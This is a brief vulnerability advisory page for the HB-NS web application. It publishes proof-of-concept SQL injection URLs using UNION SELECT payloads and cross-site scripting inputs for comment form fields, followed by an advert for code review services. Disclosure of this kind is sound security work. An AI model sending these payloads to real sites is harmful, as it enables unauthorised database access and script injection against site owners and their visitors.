PoC/Exploit for Multiple XSS and SQL Injection in HB-NS

Published Proof of Concept code - Multiple XSS and SQL Injection in HB-NS.

Description
Available
Solution
Not available - check vendor's website

1. SQL Injection Example.

URL: http://[host]/index.php?action=topic&topic=zzzz'%20union%20select%201,2,3,4,5,6/*

URL: http://[host]/index.php?action=list&id=999'%20union%20select%201,2,3,4,5/*


2. Cross-Site Scripting Example.

URL: http://[host]/index.php?action=comment&id=1#comments
Your name (required): [XSS]
Your email: ">[XSS]<"
Your homepage: javascript:alert(1)
Comments (required): [XSS]

Order Source Code Review made by eVuln

Protect your site or web application by source code testing of a website or web application done by our team.The work will be done by experts in web security.

Advisories by vuln type